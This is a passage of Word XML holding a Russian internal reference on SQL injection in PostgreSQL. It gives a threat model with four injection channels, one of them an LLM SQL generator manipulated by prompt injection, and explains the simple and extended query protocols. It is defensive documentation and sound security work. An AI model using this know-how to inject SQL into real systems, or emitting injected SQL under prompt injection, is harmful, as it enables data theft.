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8602E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>SQL-инъекции в PostgreSQL: техническая документация</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CE867F" w14:textId="1E3D0547" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606060"/>
        </w:rPr>
        <w:t>Внутренний справочник для команды Версии PostgreSQL 14–17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0AA269" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Введение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26055BC1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 Зачем эта дока, для кого</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369DCB23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Документ предназначен для разработчиков и инженеров команды DS-workshop2.0 и описывает категории SQL-инъекций, специфичные для PostgreSQL 14–17. Читается как от начала до конца, так и как справочник по конкретной категории. Целевая аудитория знает SQL и общую концепцию инъекций, но не обязательно знает PG-специфику.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86D741" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 Область действия</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FCB4C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Scope: PostgreSQL 14–17, фокус на инъекциях в application-layer SQL и серверном динамическом SQL (plpgsql).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAFF9CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Вне scope: data-hygiene checks из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UPDATE/DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, неограниченный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, прямой доступ к чувствительным полям. Эти классы покрыты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rules.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и не относятся напрямую к инъекциям.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F20A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>1.3 Модель угроз: где в системе появляются SQL-инъекции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63EE18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>В системе DS-workshop2.0 SQL-инъекции могут попасть в БД через четыре канала. Все четыре независимы; в реальной архитектуре могут присутствовать несколько одновременно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B2099A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Канал 1 — HTTP application layer.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Классический случай: HTTP-параметр (query string, body, path-параметр, header) попадает в SQL-запрос через текстовую конкатенацию или ORM-шаблон, исполняемый без параметризации. Это покрывает большую часть категорий 3.1–3.4, 3.6, 3.14, 3.15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20272E97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Канал 2 — серверный динамический SQL (plpgsql).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Хранимые функции на plpgsql, использующие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с конкатенацией строк или с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для идентификаторов. Канал серверный — язык приложения здесь не имеет значения. Покрывается категорией 3.16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3321F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Канал 3 — dump/restore pipeline.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Атакующий, имеющий право создавать объекты в схеме, вставляет специальные символы (newline, кавычки) в имя объекта; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сериализует имя в SQL-комментарий или в DDL; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_restore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> разрывается на этом и выполняет injected SQL на стороне восстанавливающего пользователя. Канал async по времени: эксплуатируется не во время работы приложения, а во время DBA-операций. Покрывается категорией 3.12.3 (см. CVE-2025-8715).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A9A7D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Канал 4 — LLM-генератор SQL под prompt injection.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Запрос к LLM формируется по недоверенному входу (пользовательский текст в RAG-контексте, документ, transcript), модель порождает SQL с инъекцией внутри, сгенерированный SQL уходит в БД. С точки зрения SQL-инъекции — это тот же канал 1, но точка инъекции находится не в HTTP-параметре, а в prompt-инструкции. С точки зрения архитектуры — это новый класс, потому что традиционные input-санитайзеры (validation на API-границе) не применимы: вход модели уже на стороне приложения, и валидировать нужно output модели. Защита — судья как раз и есть основной механизм против этого канала.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2597B62C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.4 Как читать документ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48348722" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Документ можно читать линейно — структура от простых техник к сложным. Можно использовать как справочник: каждая категория самодостаточна, имеет обзор и набор паттернов с примерами. Внутренние ссылки на другие разделы (3.X.N) даны для понимания комбинаций — переходить по ним не обязательно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2230F254" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Контекст PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACD4539" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Прежде чем разбирать конкретные категории инъекций, нужно зафиксировать четыре механизма PostgreSQL, которые определяют поверхность атаки: как именно SQL доходит до планировщика, как устроена модель привилегий, как работают расширения и как взаимодействуют схемы со </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search_path</w:t>
      </w:r>
      <w:r>
        <w:t>. Каждый из этих механизмов прямо влияет на то, какие payload-ы работают, какие — нет, и какие митигации применимы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE58B33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Архитектура исполнения SQL: simple vs extended query protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641A0827" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL обменивается с клиентом по бинарному wire-протоколу, описанному в Frontend/Backend Protocol. Для выполнения SQL протокол предусматривает два режима — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>simple query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>extended query</w:t>
      </w:r>
      <w:r>
        <w:t>. Различие между ними настолько фундаментально, что определяет работоспособность целой категории инъекций (см. 3.5 Stacked queries), а также объясняет, почему параметризованные запросы дают сильную защиту именно от инъекций, а не «просто стиль кода».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B7BE32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Simple query.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Клиент посылает одно сообщение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Query) с текстом SQL. Сервер парсит этот текст, планирует, выполняет и возвращает результат. Текст в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> может содержать любое число команд, разделённых точкой с запятой — все они будут выполнены последовательно. Параметры в этом режиме не передаются отдельно: значения нужно вставить в текст SQL до отправки. Это означает, что любое экранирование делает клиент, а сервер видит уже готовую строку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050871F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Extended query.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Клиент шлёт три (или больше) сообщения подряд: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Parse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с текстом SQL и placeholder-ами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, …; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> со значениями параметров; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Execute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для запуска. Текст SQL парсится один раз, значения параметров передаются отдельным сообщением и не парсятся как SQL — они доезжают до executor как уже типизированные значения. Главное правило этого режима: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Parse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принимает ровно одну команду. Попытка отправить multi-statement даёт ошибку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
      <w:r>
        <w:t>. Это серверное правило, его невозможно обойти ни одним клиентом, корректно работающим через extended-протокол.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3007BBA3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Сравнение в таблице:</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19479F" w14:paraId="0B133D1F"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3B61F94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Свойство</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300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CE62F8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Simple query (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="41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5BB3CAB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Extended query (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Parse</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Bind</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Execute</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="27D600F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1C8F4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Число сообщений на запрос</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B249EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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CAD18E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3+ (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="58EC824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EED48C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Параметры</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5CE524" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Подставляются клиентом в текст SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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CF473C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Передаются отдельным сообщением как значения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2CE1709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4E5F23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Multi-statement в одном запросе</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A4703F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Разрешён</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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2F302" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Запрещён: ошибка </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cannot insert multiple commands…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1335BFD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A8202C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Парсинг плана</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E72C59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Каждый раз</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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9D2F8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Один раз, плюс кэширование (prepared statement)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="547C3CB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0D5494" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Где живёт защита</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727174" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Только в клиенте (escape)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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7581E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>На сервере (значения вообще не парсятся)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D32B6DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Из этой архитектуры следуют три практических вывода для остальной доки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9E0976" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Во-первых, термин «параметризованный запрос» — это не стиль написания кода, а конкретный режим протокола. Запрос вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM t WHERE id = $1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, отправленный через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> со строкой-склейкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1 → '42'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, формально использует знак </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
